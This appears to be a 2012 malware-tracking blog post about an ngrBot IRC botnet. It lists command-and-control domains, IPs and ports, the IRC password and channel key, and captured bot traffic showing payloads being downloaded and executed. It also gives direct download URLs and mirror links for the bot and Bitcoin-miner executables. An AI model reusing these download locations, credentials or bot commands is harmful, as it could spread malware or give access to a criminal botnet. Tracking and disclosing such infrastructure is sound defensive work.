xL.x1x2.in(ngrBot hosted in France Paris Gandi)

By Pig, January 3, 2012

Resolved : [xL.x1x2.in] To [95.142.167.131]port 4949 for irc
Resolved : [xL.x1x2.in] To [95.142.166.253]port 4949 for irc
Resolved : [xL.x1x2.in] To [92.243.15.137]port 4949 for irc
Resolved : [xL.x1x2.in] To [103.1.184.45]port 4949 for irc

Remote Host Port Number
176.9.42.247 8332 Bitcoin Malware

199.15.234.7 80

199.7.176.144 80

199.7.177.228 80

74.120.10.153 80

74.120.8.161 80

95.142.167.131 4949 irc port (before he used port 5900)u need password for conection in this botnet
is not so hard for people wo really want to join there geting the passwd lol

The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://s481.hotfile.com/get/c7beee1329db43f39cc1d9b0df90a2fb0f227c7a/4f0345cd/2/eee0664170e0751b/84a4dcc/minerv4.exe
http://hotfile.com/dl/139063723/171a7fe/skkill.exe
http://hotfile.com/dl/139087308/808d704/minerv4.exe
http://hotfile.com/dl/138785531/af1c0bc/botxxxx1-2.exe
http://s332.hotfile.com/get/d414aca6e80162025fc78a0e2659aa1fc8727ab7/4f0345cb/2/1bdccba2084518fe/849f1ab/skkill.exe
http://s82.hotfile.com/get/58bcf25a8d53349f0da7e8bf9b40b69ad8d07d24/4f0345cf/2/94fdacb608286eb7/845b2fb/botxxxx1-2.exe

just in case the hecker send abuse to hotfile or he remove exe files here u have them all:
Download
Download
Download
Download
Download

UPDATE:

Resolved : [xL.x1x2.in] To [92.243.28.75] PASS ngrBot
Resolved : [xL.x1x2.in] To [95.142.167.61] PASS ngrBot
Resolved : [xL.x1x2.in] To [92.243.14.131] PASS ngrBot
Resolved : [xL.x1x2.in] To [92.243.15.37] PASS ngrBot

NICK n{US|XPa}vlsxleu
USER vlsxleu 0 0 :vlsxleu
JOIN ##RedEm-001## redem
PRIVMSG ##RedEm-001## :[d=”http://img103.herosh.com/2012/02/09/704386181.gif” s=”203681 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataZcxaxz.exe” – Download retries: 0

Now talking in ##RedEm-001##
Topic On: [ ##RedEm-001## ] [ !NAZELup http://img103.herosh.com/2012/02/09/704386181.gif F418F0FE98948FFFCAB23BBDF5D0B362 ]
Topic By: [ xXxXxX ]

Remote Host Port Number
92.243.29.137 4949

NICK VirUs-erqpce
USER VirUs “” “qnw” :
8Coded
8VirUs..
JOIN ##A## DC

UPDATE:
92.243.29.137 5900 PASS ngrBot

NICK n{US|XPa}ddiwbhu
USER ddiwbhu 0 0 :ddiwbhu
JOIN ##RedEm-001## redem
PRIVMSG ##RedEm-001## :[d=”http://img102.herosh.com/2012/02/23/67950698.gif” s=”174879 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0

hosting infos:
http://whois.domaintools.com/92.243.29.137

Categories: Uncategorized